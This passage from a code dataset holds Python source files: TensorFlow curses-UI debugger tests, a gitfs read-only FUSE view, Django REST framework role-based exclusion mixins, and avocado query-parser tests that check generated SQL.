    self.assertEqual(4, len(ui.unwrapped_outputs))
    for i in range(4):
      self.assertEqual(["bar"] * 3, ui.unwrapped_outputs[i].lines)
      self.assertEqual({}, ui.unwrapped_outputs[i].font_attr_segs)

    self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
    self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)

    # Every searched output carries the same highlighting for "b" and "r".
    for j in range(1, 4):
      self.assertEqual(["bar"] * 3, ui.wrapped_outputs[j].lines[:3])
      self.assertEqual({
          0: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
          1: [(0, 1, "black_on_white"), (2, 3, "black_on_white")],
          2: [(0, 1, "black_on_white"), (2, 3, "black_on_white")]
      }, ui.wrapped_outputs[j].font_attr_segs)

    # Each continuation scrolls the output pad down by one matched row.
    self.assertEqual([0, 0, 1, 2], ui.output_pad_rows)
  def testRegexSearchUnderLineWrapping(self):
    """Continuation search should account for wrapped (multi-row) lines."""
    ui = MockCursesUI(
        40,
        5,  # Use a narrow window to trigger line wrapping
        command_sequence=[
            string_to_codes("babble -n 3 -l foo-bar-baz-qux\n"),
            string_to_codes("/foo\n"),  # Regex search and highlight.
            string_to_codes("/\n"),  # Continue scrolling down: 1st time.
            string_to_codes("/\n"),  # Continue scrolling down: 2nd time.
            string_to_codes("/\n"),  # Continue scrolling down: 3rd time.
            string_to_codes("/\n"),  # Continue scrolling down: 4th time.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some")
    ui.run_ui()

    self.assertEqual(4, len(ui.wrapped_outputs))
    # Each original line wraps into four screen rows on the 5-column window.
    for wrapped_output in ui.wrapped_outputs:
      self.assertEqual(["foo-", "bar-", "baz-", "qux"] * 3,
                       wrapped_output.lines[0 : 12])

    # The scroll location should reflect the line wrapping.
    self.assertEqual([0, 0, 4, 8], ui.output_pad_rows)
  def testRegexSearchNoMatchContinuation(self):
    """Test continuing scrolling when there is no regex match."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/foo\n"),  # Regex search and highlight.
            string_to_codes("/\n"),  # Continue scrolling down.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # The regex search and continuation search in the 3rd command should not
    # have produced any output.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual([0], ui.output_pad_rows)
  def testRegexSearchContinuationWithoutSearch(self):
    """Test continuation scrolling when no regex search has been performed."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/\n"),  # Continue scrolling without search first.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # A bare "/" without a prior search should be a no-op.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual([0], ui.output_pad_rows)
  def testRegexSearchWithInvalidRegex(self):
    """Test using invalid regex to search."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/[\n"),  # Search with an invalid (unterminated) regex.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    # Invalid regex should not have led to a new screen of output.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual([0], ui.output_pad_rows)

    # Invalid regex should have led to a toast error message.
    self.assertEqual(["ERROR: Invalid regular expression: \"[\""], ui.toasts)
  def testRegexSearchFromCommandHistory(self):
    """Test regex search commands are recorded in command history."""
    ui = MockCursesUI(
        40,
        80,
        command_sequence=[
            string_to_codes("babble -n 3\n"),
            string_to_codes("/(b|r)\n"),  # Regex search and highlight.
            string_to_codes("babble -n 4\n"),
            [curses.KEY_UP],
            [curses.KEY_UP],
            string_to_codes("\n"),  # Hit Up twice and Enter.
            self._EXIT
        ])

    ui.register_command_handler(
        "babble", self._babble, "babble some", prefix_aliases=["b"])
    ui.run_ui()

    self.assertEqual(4, len(ui.wrapped_outputs))

    self.assertEqual(["bar"] * 3, ui.wrapped_outputs[0].lines[:3])
    self.assertEqual({}, ui.wrapped_outputs[0].font_attr_segs)

    self.assertEqual(["bar"] * 3, ui.wrapped_outputs[1].lines[:3])
    for i in range(3):
      self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
                       ui.wrapped_outputs[1].font_attr_segs[i])

    self.assertEqual(["bar"] * 4, ui.wrapped_outputs[2].lines[:4])
    self.assertEqual({}, ui.wrapped_outputs[2].font_attr_segs)

    # The regex search command loaded from history should have worked on the
    # new screen output.
    self.assertEqual(["bar"] * 4, ui.wrapped_outputs[3].lines[:4])
    for i in range(4):
      self.assertEqual([(0, 1, "black_on_white"), (2, 3, "black_on_white")],
                       ui.wrapped_outputs[3].font_attr_segs[i])
  def testDisplayTensorWithIndices(self):
    """Test displaying tensor with indices."""
    ui = MockCursesUI(
        8,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            [curses.KEY_NPAGE],
            [curses.KEY_NPAGE],
            [curses.KEY_NPAGE],
            [curses.KEY_END],
            [curses.KEY_NPAGE],  # This PageDown goes over the bottom limit.
            [curses.KEY_PPAGE],
            [curses.KEY_PPAGE],
            [curses.KEY_PPAGE],
            [curses.KEY_HOME],
            [curses.KEY_PPAGE],  # This PageUp goes over the top limit.
            self._EXIT
        ])

    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()

    # One output/scroll event per command and per scrolling key press.
    self.assertEqual(11, len(ui.unwrapped_outputs))
    self.assertEqual(11, len(ui.output_array_pointer_indices))
    self.assertEqual(11, len(ui.scroll_messages))

    # The unwrapped output is identical across all scroll positions.
    for i in range(11):
      self.assertEqual([
          "Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.]])"
      ], ui.unwrapped_outputs[i].lines)

    # The pointer-indices dict maps screen row 0 / -1 (bottom) to the array
    # element visible there, or None when the edge shows no element.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[0])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[0])

    # Scrolled down one line.
    self.assertEqual({
        0: None,
        -1: [2, 0]
    }, ui.output_array_pointer_indices[1])
    self.assertIn(" Scroll (PgDn/PgUp): 16.67% -[2,0] ", ui.scroll_messages[1])

    # Scrolled down one line.
    self.assertEqual({
        0: [0, 0],
        -1: [3, 0]
    }, ui.output_array_pointer_indices[2])
    self.assertIn(" Scroll (PgDn/PgUp): 33.33% [0,0]-[3,0] ",
                  ui.scroll_messages[2])

    # Scrolled down one line.
    self.assertEqual({
        0: [1, 0],
        -1: [4, 0]
    }, ui.output_array_pointer_indices[3])
    self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
                  ui.scroll_messages[3])

    # Scroll to the bottom.
    self.assertEqual({
        0: [4, 0],
        -1: None
    }, ui.output_array_pointer_indices[4])
    self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[4])

    # Attempt to scroll beyond the bottom should lead to no change.
    self.assertEqual({
        0: [4, 0],
        -1: None
    }, ui.output_array_pointer_indices[5])
    self.assertIn(" Scroll (PgUp): 100.00% [4,0]- ", ui.scroll_messages[5])

    # Scrolled up one line.
    self.assertEqual({
        0: [3, 0],
        -1: None
    }, ui.output_array_pointer_indices[6])
    self.assertIn(" Scroll (PgDn/PgUp): 83.33% [3,0]- ", ui.scroll_messages[6])

    # Scrolled up one line.
    self.assertEqual({
        0: [2, 0],
        -1: None
    }, ui.output_array_pointer_indices[7])
    self.assertIn(" Scroll (PgDn/PgUp): 66.67% [2,0]- ", ui.scroll_messages[7])

    # Scrolled up one line.
    self.assertEqual({
        0: [1, 0],
        -1: [4, 0]
    }, ui.output_array_pointer_indices[8])
    self.assertIn(" Scroll (PgDn/PgUp): 50.00% [1,0]-[4,0] ",
                  ui.scroll_messages[8])

    # Scroll to the top.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[9])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[9])

    # Attempt to scroll pass the top limit should lead to no change.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[10])
    self.assertIn(" Scroll (PgDn): 0.00% -[1,0] ", ui.scroll_messages[10])
  def testScrollTensorByValidIndices(self):
    """Test scrolling to specified (valid) indices in a tensor."""
    ui = MockCursesUI(
        8,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            string_to_codes("@[0, 0]\n"),  # Scroll to element [0, 0].
            string_to_codes("@1,0\n"),  # Scroll so that row [1, 0] is on top.
            string_to_codes("@[0,2]\n"),  # Scroll back to row 0; presumably
                                          # the column index does not affect
                                          # vertical scrolling — confirm.
            self._EXIT
        ])

    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()

    self.assertEqual(4, len(ui.unwrapped_outputs))
    self.assertEqual(4, len(ui.output_array_pointer_indices))
    for i in range(4):
      self.assertEqual([
          "Tensor \"m\":", "", "array([[ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.],",
          " [ 1., 1., 1., 1., 1.]])"
      ], ui.unwrapped_outputs[i].lines)

    # Initial position: top of the output.
    self.assertEqual({
        0: None,
        -1: [1, 0]
    }, ui.output_array_pointer_indices[0])
    # After "@[0, 0]": element [0, 0] is at the top of the visible region.
    self.assertEqual({
        0: [0, 0],
        -1: [3, 0]
    }, ui.output_array_pointer_indices[1])
    # After "@1,0": element [1, 0] is at the top (bare-index syntax).
    self.assertEqual({
        0: [1, 0],
        -1: [4, 0]
    }, ui.output_array_pointer_indices[2])
    # After "@[0,2]": back to the same position as "@[0, 0]".
    self.assertEqual({
        0: [0, 0],
        -1: [3, 0]
    }, ui.output_array_pointer_indices[3])
  def testScrollTensorByInvalidIndices(self):
    """Test scrolling to specified invalid indices in a tensor."""
    ui = MockCursesUI(
        8,  # Use a small screen height to cause scrolling.
        80,
        command_sequence=[
            string_to_codes("print_ones --size 5\n"),
            string_to_codes("@[10, 0]\n"),  # Scroll to invalid indices.
            string_to_codes("@[]\n"),  # Scroll to invalid indices.
            string_to_codes("@\n"),  # Scroll to invalid indices.
            self._EXIT
        ])

    ui.register_command_handler("print_ones", self._print_ones,
                                "print an all-one matrix of specified size")
    ui.run_ui()

    # Because all scroll-by-indices commands are invalid, there should be only
    # one output event.
    self.assertEqual(1, len(ui.unwrapped_outputs))
    self.assertEqual(1, len(ui.output_array_pointer_indices))

    # Check error messages. (toasts[0] is from the print_ones command itself.)
    self.assertEqual("ERROR: Indices exceed tensor dimensions.", ui.toasts[1])
    self.assertEqual("ERROR: invalid literal for int() with base 10: ''",
                     ui.toasts[2])
    self.assertEqual("ERROR: Empty indices.", ui.toasts[3])
# Script entry point: run the test suite when executed directly.
if __name__ == "__main__":
  googletest.main()
| DCSaunders/tensorflow | tensorflow/python/debug/cli/curses_ui_test.py | Python | apache-2.0 | 39,416 |
# Copyright 2014 PressLabs SRL
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from errno import EROFS
from fuse import FuseOSError, ENOTSUP
from .view import View
class ReadOnlyView(View):
    """A FUSE view that refuses every mutating operation with EROFS.

    Read-type operations succeed trivially (returning 0 where FUSE expects
    a status code), while anything that would modify the tree raises
    ``FuseOSError(EROFS)`` so the mount behaves like a read-only filesystem.
    """

    # Open flags that imply an intent to write; open() rejects all of them.
    _WRITE_FLAGS = (os.O_WRONLY | os.O_RDWR | os.O_APPEND | os.O_TRUNC |
                    os.O_CREAT)

    def getxattr(self, path, name, *args):
        """Extended attributes are not supported by this view."""
        raise FuseOSError(ENOTSUP)

    def open(self, path, flags):
        """Allow read-only opens; refuse any write-intent flags."""
        if self._WRITE_FLAGS & flags:
            raise FuseOSError(EROFS)
        return 0

    # NOTE: create/write accept extra positional/keyword arguments because
    # FUSE invokes them with more parameters (e.g. write(path, data, offset,
    # fh)); without *args the calls would fail with TypeError instead of
    # surfacing EROFS to the caller.
    def create(self, path, fh, *args, **kwargs):
        raise FuseOSError(EROFS)

    def write(self, path, fh, *args, **kwargs):
        raise FuseOSError(EROFS)

    def opendir(self, path):
        return 0

    def releasedir(self, path, fi):
        return 0

    def flush(self, path, fh):
        return 0

    def release(self, path, fh):
        return 0

    def access(self, path, amode):
        """Grant access unless write permission is requested."""
        if amode & os.W_OK:
            raise FuseOSError(EROFS)
        return 0

    def mkdir(self, path, mode):
        raise FuseOSError(EROFS)

    def utimens(self, path, times=None):
        raise FuseOSError(EROFS)

    def chown(self, path, uid, gid):
        raise FuseOSError(EROFS)

    def chmod(self, path, mode):
        raise FuseOSError(EROFS)
| ksmaheshkumar/gitfs | gitfs/views/read_only.py | Python | apache-2.0 | 1,744 |
from djangorestframework.mixins import ModelMixin, CreateModelMixin, \
UpdateModelMixin
from djangorestframework_extensions.utils import user_passes_test
__all__ = ['RoleBasedExclusion', 'RestrictedModelMixin',
'RestrictedCreateModelMixin', 'RestrictedUpdateModelMixin']
class RoleBasedExclusion(object):
    """Mixin that resolves serializer field exclusions by the user's role.

    ``self.exclude`` may be a plain sequence of field names (applied to
    everyone) or a dict keyed by role::

        {
            'superuser': (...),  # used when request.user.is_superuser
            'staff': (...),      # used when request.user.is_staff
            'roles': ((test, exclusion), ...),  # first passing test wins
            None: (...),         # catch-all fallback
        }
    """

    def role_based_exclusion(self):
        """Return the sequence of field names to exclude for this request."""
        exclude = self.exclude
        if not isinstance(exclude, dict):
            return exclude or ()

        user = getattr(self.request, 'user', None)
        if user:
            if user.is_superuser:
                return exclude.get('superuser', ())
            elif user.is_staff:
                return exclude.get('staff', ())

            for test, exclusion in exclude.get('roles', ()):
                if user_passes_test(user, test):
                    return exclusion

        # Fall back to the catch-all entry. Use .get() so a dict without an
        # explicit ``None`` key no longer raises KeyError.
        return exclude.get(None, ())

    def get_fields(self, obj):
        """Compute the serialized field set, applying role-based exclusions
        when no explicit ``fields`` list is configured."""
        fields = self.fields

        # If `fields` is not set, we use the default fields and modify
        # them with `include` and `exclude`
        if not fields:
            default = self.get_default_fields(obj)
            include = self.include or ()
            exclude = self.role_based_exclusion() or ()
            fields = set(default + list(include)) - set(exclude)

        return fields
class RestrictedModelMixin(RoleBasedExclusion, ModelMixin):
    """ModelMixin whose serialized field set honours role-based exclusions."""
    pass
class RestrictedCreateModelMixin(RestrictedModelMixin, CreateModelMixin):
    """CreateModelMixin variant with role-based field exclusions.

    NOTE(review): post() is overridden to a no-op, which appears to disable
    the inherited create behaviour — presumably intentional; confirm.
    """
    def post(self, request, *args, **kwargs):
        pass
class RestrictedUpdateModelMixin(RestrictedModelMixin, UpdateModelMixin):
    """UpdateModelMixin variant with role-based field exclusions.

    NOTE(review): put() is overridden to a no-op, which appears to disable
    the inherited update behaviour — presumably intentional; confirm.
    """
    def put(self, request, *args, **kwargs):
        pass
| pombredanne/djangorestframework_extensions | djangorestframework_extensions/mixins.py | Python | bsd-2-clause | 1,649 |
from copy import deepcopy
from django.test import TestCase
from django.core.exceptions import ValidationError
from django.core import management
from avocado.query import oldparsers as parsers
from avocado.models import DataConcept, DataField, DataConceptField
from ....models import Employee
class DataContextParserTestCase(TestCase):
    """Tests for avocado's datacontext parser: validation of condition
    trees, concept/field resolution, and translation into Django ORM
    queries. (Python 2-era code: uses ``unicode()``.)"""
    fixtures = ['employee_data.json']

    def setUp(self):
        management.call_command('avocado', 'init', 'tests', quiet=True)

    def test_valid(self):
        title = DataField.objects.get_by_natural_key('tests.title.name')

        # Single by id (deprecated)
        attrs = {
            'id': title.pk,
            'operator': 'exact',
            'value': 'CEO',
            'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
            'language': 'Name is CEO'
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # Single by dotted label
        attrs = {
            'field': 'tests.title.name',
            'operator': 'exact',
            'value': 'CEO',
            'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
            'language': 'Name is CEO'
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # Single by label list
        attrs = {
            'field': ['tests', 'title', 'name'],
            'operator': 'exact',
            'value': 'CEO',
            'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
            'language': 'Name is CEO'
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # Single by field
        attrs = {
            'field': title.pk,
            'operator': 'exact',
            'value': 'CEO',
            'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
            'language': 'Name is CEO'
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # Branch node
        attrs = {
            'type': 'and',
            'children': [{
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO',
                'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
                'language': 'Name is CEO'
            }, {
                'field': 'tests.employee.first_name',
                'operator': 'exact',
                'value': 'John',
                'cleaned_value': {'value': 'John', 'label': 'John'},
                'language': 'First Name is John'
            }],
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # No children
        attrs = {
            'type': 'and',
            'children': [],
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # 1 child
        attrs = {
            'type': 'and',
            'children': [{
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO',
                'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
                'language': 'Name is CEO'
            }]
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

    def test_invalid(self):
        # Non-existent data field
        attrs = parsers.datacontext.validate({
            'field': 999,
            'operator': 'exact',
            'value': 'CEO'
        })
        self.assertFalse(attrs['enabled'])

        # Object must be a dict
        self.assertRaises(ValidationError, parsers.datacontext.validate, 1)

        # Invalid logical operator
        attrs = parsers.datacontext.validate({'type': 'foo', 'children': []})
        self.assertFalse(attrs['enabled'])

        # Missing 'value' key in first condition
        attrs = parsers.datacontext.validate({
            'type': 'and',
            'children': [{
                'field': 'tests.title.name',
                'operator': 'exact'
            }, {
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO'
            }]
        }, tree=Employee)

        # Only the offending child is disabled; the branch stays enabled.
        self.assertTrue(attrs.get('enabled', True))
        self.assertFalse(attrs['children'][0]['enabled'])
        self.assertTrue(attrs['children'][1].get('enabled', True))

    def test_field_for_concept(self):
        f = DataField.objects.get(model_name='title', field_name='name')

        c1 = DataConcept()
        c2 = DataConcept()

        c1.save()
        c2.save()

        cf = DataConceptField(concept=c1, field=f)
        cf.save()

        # A condition may reference a field through a concept, but only a
        # concept that actually contains the field.
        attrs = {
            'concept': c1.pk,
            'field': f.pk,
            'operator': 'exact',
            'value': 'CEO',
            'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
            'language': 'Name is CEO'
        }
        self.assertEqual(
            parsers.datacontext.validate(deepcopy(attrs), tree=Employee),
            attrs)

        # Invalid concept
        attrs = parsers.datacontext.validate({
            'concept': c2.pk,
            'field': f.pk,
            'operator': 'exact',
            'value': 'CEO',
        }, tree=Employee)
        self.assertFalse(attrs['enabled'])

    def test_parsed_node(self):
        node = parsers.datacontext.parse({
            'type': 'and',
            'children': [],
        }, tree=Employee)

        # No condition has been defined..
        self.assertEqual(node.condition, None)

        node = parsers.datacontext.parse({
            'type': 'and',
            'children': [{
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO',
            }]
        }, tree=Employee)

        # Only the one condition is represented
        self.assertEqual(str(node.condition),
                         "(AND: ('title__name__exact', u'CEO'))")

    def test_apply(self):
        f = DataField.objects.get_by_natural_key('tests',
                                                 'title',
                                                 'boss')
        f1 = DataField.objects.get_by_natural_key('tests',
                                                  'employee',
                                                  'first_name')

        node = parsers.datacontext.parse({
            'field': 'tests.title.boss',
            'operator': 'exact',
            'value': True
        }, tree=Employee)

        # SQL comparisons ignore whitespace differences.
        self.assertEqual(
            unicode(node.apply().values('id').query).replace(' ', ''),
            'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
            'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
            '"tests_title"."id") WHERE "tests_title"."boss" = True '
            .replace(' ', ''))

        self.assertEqual(node.language, {
            'operator': 'exact',
            'language': u'Boss is True',
            'field': f.pk,
            'value': True
        })

        # Branch node
        node = parsers.datacontext.parse({
            'type': 'and',
            'children': [{
                'field': 'tests.title.boss',
                'operator': 'exact',
                'value': True,
            }, {
                'field': 'tests.employee.first_name',
                'operator': 'exact',
                'value': 'John',
            }]
        }, tree=Employee)

        self.assertEqual(
            unicode(node.apply().values('id').query).replace(' ', ''),
            'SELECT DISTINCT "tests_employee"."id" FROM "tests_employee" '
            'INNER JOIN "tests_title" ON ("tests_employee"."title_id" = '
            '"tests_title"."id") WHERE ("tests_employee"."first_name" = John '
            'AND "tests_title"."boss" = True )'.replace(' ', ''))

        self.assertEqual(node.language, {
            'type': 'and',
            'children': [{
                'field': f.pk,
                'operator': 'exact',
                'value': True,
                'language': 'Boss is True',
            }, {
                'field': f1.pk,
                'operator': 'exact',
                'value': 'John',
                'language': 'First Name is John',
            }]
        })
class DataViewParserTestCase(TestCase):
fixtures = ['tests/fixtures/employee_data.json']
def setUp(self):
management.call_command('avocado', 'init', 'tests', publish=False,
concepts=False, quiet=True)
f1 = DataField.objects.get_by_natural_key('tests',
'employee',
'first_name')
f2 = DataField.objects.get_by_natural_key('tests',
'employee',
'last_name')
self.c = DataConcept()
self.c.save()
DataConceptField(concept=self.c, field=f1).save()
DataConceptField(concept=self.c, field=f2).save()
def test_valid(self):
# Single by id
self.assertEqual(parsers.dataview.validate([{
'concept': self.c.pk
}], tree=Employee), [{
'concept': self.c.pk,
}])
self.assertEqual(parsers.dataview.validate([{
'concept': self.c.pk,
'sort': 'desc',
}], tree=Employee), [{
'concept': self.c.pk,
'sort': 'desc',
}])
def test_valid_legacy(self):
# Single by id
self.assertEqual(parsers.dataview.validate({
'columns': [self.c.pk],
}, tree=Employee), [{
'concept': self.c.pk,
'visible': True,
'sort': None,
'sort_index': None,
}])
self.assertEqual(parsers.dataview.validate({
'ordering': [(self.c.pk, 'desc')],
}, tree=Employee), [{
'concept': self.c.pk,
'visible': False,
'sort': 'desc',
'sort_index': 0,
}])
def test_invalid(self):
# Non-existent data field
facets = parsers.dataview.validate({'columns': [999]})
self.assertFalse(facets[0]['enabled'])
self.assertTrue(facets[0]['errors'])
# Invalid ordering
facets = parsers.dataview.validate([{
'concept': self.c.pk,
'sort': 'foo',
}])
self.assertTrue(facets[0]['warnings'])
def test_apply(self):
node = parsers.dataview.parse([{
'concept': self.c.pk,
}], tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT "tests_employee"."id", "tests_employee"."first_name", '
'"tests_employee"."last_name" FROM "tests_employee"'
.replace(' ', ''))
node = parsers.dataview.parse([{
'concept': self.c.pk,
'sort': 'desc',
'visible': False,
}], tree=Employee)
self.assertEqual(
unicode(node.apply().query).replace(' ', ''),
'SELECT "tests_employee"."id" FROM "tests_employee" '
'ORDER BY "tests_employee"."first_name" DESC, '
'"tests_employee"."last_name" DESC'
.replace(' ', ''))
def test_apply_distinct(self):
node = parsers.dataview.parse([{
'concept': self.c.pk,
}], tree=Employee)
self.assertEqual(
unicode(node.apply(Employee.objects.distinct()).query)
.replace(' ', ''),
'SELECT DISTINCT "tests_employee"."id", '
'"tests_employee"."first_name", '
'"tests_employee"."last_name" FROM "tests_employee"'
.replace(' ', ''))
def test_implicit_apply_distinct(self):
    """Sorting a hidden concept across joined tables with DISTINCT.

    Builds a concept spanning two related models (office.location and
    title.name) so applying it requires JOINs in the generated SQL.
    """
    f1 = DataField.objects.get_by_natural_key('tests',
                                              'office',
                                              'location')
    f2 = DataField.objects.get_by_natural_key('tests',
                                              'title',
                                              'name')

    c = DataConcept()
    c.save()

    DataConceptField(concept=c, field=f1).save()
    DataConceptField(concept=c, field=f2).save()

    # Due to the use of distinct, the concept fields appear in the SELECT
    # statement at this point. This is not a bug, but a requirement of SQL.
    # These columns are stripped downstream by the exporter.
    node = parsers.dataview.parse([{
        'concept': c.pk,
        'sort': 'desc',
        'visible': False,
    }], tree=Employee)

    self.assertEqual(
        unicode(node.apply(Employee.objects.distinct()).query)
        .replace(' ', ''),
        'SELECT DISTINCT "tests_employee"."id", '
        '"tests_office"."location", "tests_title"."name" FROM '
        '"tests_employee" INNER JOIN "tests_office" ON '
        '("tests_employee"."office_id" = "tests_office"."id") LEFT OUTER '
        'JOIN "tests_title" ON ("tests_employee"."title_id" = '
        '"tests_title"."id") ORDER BY "tests_office"."location" DESC, '
        '"tests_title"."name" DESC'
        .replace(' ', ''))
class DataQueryParserTestCase(TestCase):
    """Validation, parsing and SQL generation for combined dataquery
    (context + view) descriptions.

    NOTE: uses ``unicode`` and ``u''`` literals, so this module is
    Python 2 only.
    """

    fixtures = ['employee_data.json']

    def setUp(self):
        # Initialize avocado metadata for the test app and build a
        # two-field (first_name, last_name) concept used by the tests.
        management.call_command('avocado', 'init', 'tests', publish=False,
                                concepts=False, quiet=True)
        f1 = DataField.objects.get_by_natural_key('tests',
                                                  'employee',
                                                  'first_name')
        f2 = DataField.objects.get_by_natural_key('tests',
                                                  'employee',
                                                  'last_name')
        self.c = DataConcept()
        self.c.save()
        DataConceptField(concept=self.c, field=f1).save()
        DataConceptField(concept=self.c, field=f2).save()

    def test_valid(self):
        """Valid context/view combinations pass validation; a missing
        half of the pair is normalized to None."""
        self.assertEqual(parsers.dataquery.validate({}, tree=Employee), None)

        # Both a context and a view supplied: returned unchanged.
        attrs = {
            'context': {
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO',
                'cleaned_value': {'value': 'CEO', 'label': 'CEO'},
                'language': 'Name is CEO'
            },
            'view': [{
                'concept': self.c.pk,
            }],
        }
        exp_attrs = deepcopy(attrs)
        self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
                         exp_attrs)

        # Only the context
        attrs = {
            'context': {
                'field': 'tests.title.name',
                'operator': 'exact',
                'value': 'CEO',
                'cleaned_value': {
                    'value': 'CEO',
                    'label': 'CEO',
                },
                'language': 'Name is CEO'
            }
        }
        exp_attrs = deepcopy(attrs)
        exp_attrs['view'] = None
        self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
                         exp_attrs)

        # Only the view
        attrs = {
            'view': [{
                'concept': self.c.pk,
                'visible': False,
                'sort': 'desc',
            }]
        }
        exp_attrs = {
            'context': None,
            'view': [{
                'visible': False,
                'concept': self.c.pk,
                'sort': 'desc',
            }],
        }
        self.assertEqual(parsers.dataquery.validate(attrs, tree=Employee),
                         exp_attrs)

    def test_parsed_node(self):
        """Sub-nodes are only created for the parts actually supplied."""
        # Make sure no context or view subnodes are created
        node = parsers.dataquery.parse({}, tree=Employee)
        self.assertEqual(node.datacontext_node, None)
        self.assertEqual(node.dataview_node, None)

        node = parsers.dataquery.parse({
            'context': {
                'type': 'and',
                'children': [],
            }
        }, tree=Employee)
        # No condition has been defined..
        self.assertEqual(node.datacontext_node.condition, None)

        node = parsers.dataquery.parse({
            'context': {
                'type': 'and',
                'children': [{
                    'field': 'tests.title.name',
                    'operator': 'exact',
                    'value': 'CEO',
                }]
            }
        }, tree=Employee)
        # Only the one condition is represented
        self.assertEqual(str(node.datacontext_node.condition),
                         "(AND: ('title__name__exact', u'CEO'))")

    def test_apply(self):
        """Applying the parsed node generates the expected SQL for
        context+view, view-only and context-only descriptions.

        Whitespace is stripped on both sides so the assertions are
        insensitive to SQL formatting.
        """
        node = parsers.dataquery.parse({
            'context': {
                'field': 'tests.title.boss',
                'operator': 'exact',
                'value': True
            },
            'view': [{
                'concept': self.c.pk,
            }],
        }, tree=Employee)
        self.assertEqual(
            unicode(node.apply().query).replace(' ', ''),
            'SELECT DISTINCT "tests_employee"."id", '
            '"tests_employee"."first_name", "tests_employee"."last_name" FROM '
            '"tests_employee" INNER JOIN "tests_title" ON '
            '("tests_employee"."title_id" = "tests_title"."id") '
            'WHERE "tests_title"."boss" = True '
            .replace(' ', ''))

        # Just the view
        node = parsers.dataquery.parse({
            'view': [{
                'concept': self.c.pk,
                'sort': 'desc',
            }]
        }, tree=Employee)
        self.assertEqual(
            unicode(node.apply().query).replace(' ', ''),
            'SELECT DISTINCT "tests_employee"."id", '
            '"tests_employee"."first_name", '
            '"tests_employee"."last_name" FROM "tests_employee" '
            'ORDER BY "tests_employee"."first_name" DESC, '
            '"tests_employee"."last_name" DESC'.replace(' ', ''))

        # Just the context
        node = parsers.dataquery.parse({
            'context': {
                'field': 'tests.title.boss',
                'operator': 'exact',
                'value': True
            }
        }, tree=Employee)
        self.assertEqual(
